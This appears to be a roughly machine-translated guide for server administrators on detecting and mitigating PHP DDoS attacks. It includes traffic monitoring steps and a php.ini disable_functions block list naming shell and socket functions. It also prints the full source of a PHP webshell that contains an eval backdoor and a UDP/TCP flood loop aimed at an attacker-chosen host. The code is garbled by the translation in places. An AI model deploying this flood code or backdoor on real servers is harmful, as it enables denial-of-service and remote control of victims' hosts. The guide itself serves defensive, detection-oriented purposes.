This type of attack has one of the biggest features, that is, the upload traffic is increased, usually up to dozens of of the traffic to nearly hundred m, the entire service device, and the entire cabinet of broadband blocked, so that the site can not operate, and such an attack, we can not from the remote processing, one but the Phpshell operation, your broadband will be all occupied, The remote is not able to converge.
After the attack can do as long as the contact room staff, let him into your service to your IIS shut down, and then did not find out which site was invaded, as far as possible a site also do not open, so as not to be attacked again, how to see is not this attack, can not say off ISS good, is this attack, And to be based on a more accurate view, to be sure what is the problem, open 360 security guards, and then turn over the functions of Daquan, into the inside to find traffic firewall, here you can see each process upload and download traffic several, pay attention to hide the system service also point to see, Ordinary is upload super big is Phpddos attack, and ordinary will be in w3wp.exe and mysql.exe upload traffic will be very large, the smallest also hundreds of m, the maximum number of G, good know is this attack, we will think method processing.
Treatment methods:
1. Apply 360 traffic firewall, w3wp.exe and mysql.exe upload traffic limit, according to your service device itself broadband status stop limit, ordinary limit in 200-300kb no problem, so not afraid of Phpshell launched a large traffic attack, However, there is a flaw in this approach, that is, when you restart the service, you previously restricted w3wp.exe and Mysql.exe will not work, to re-limit the use of this method of friends must pay attention to this point.
2. After changing the PHP operating environment to deal with, open php.ini find disable_functions= This, and then change the back to Gzinflate,passthru,exec,system,chroot,scandir,chgrp, Chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog, Readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen. Will allow_url_fopen = off, and then find Extension=php_sockets.dll this, the front with a semicolon, is to block out this.
3. After looking for attack source processing, batch find all the site can exist Phpshell attack source code, source code (because the code is too messy to show to everyone in the picture)
Copy CodeThe code is as follows:
<?php
Eval ($_POST[CHR (90)]);
Set_time_limit (86400);
Ignore_user_abort (True);
$packets = 0;
$http = $_get[' http '];
$rand = $_get[' exit '];
$exec _time = $_get[' time ');
if (StrLen ($http) ==0 or StrLen ($rand) ==0 or StrLen ($exec _time) ==0)
{
if (StrLen ($_get[' rat ']) <>0)
{
echo $_get[' rat '].$_server["Http_host"]. "|". gethostbyname ($_server[' server_name '). "|". Php_uname (). "|". $_server[' server_software '].$_get[' rat ';
Exit
}
echo "PHP Terminator";
Exit
}
for ($i =0; $i <65535; $i + +)
{
$out. = "X";
}
Udp1-fsockopen UDP2 Pfsockopen TCP3 cc.center
$max _time = time () + $exec _time;
if ($rand ==53)
while (1)
{
$packets + +;
if (Time () > $max _time)
{
Break
}
$fp = Fsockopen ("udp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
Else
if ($rand ==500)
while (1)
{
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Pfsockopen ("udp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
Else
while (1)
{
$packets + +;
if (Time () > $max _time) {
Break
}
$fp = Pfsockopen ("tcp://$http", $rand, $errno, $ERRSTR, 5);
if ($FP)
{
Fwrite ($fp, $out);
Fclose ($FP);
}
}
?>
Several defense methods for PHP DDoS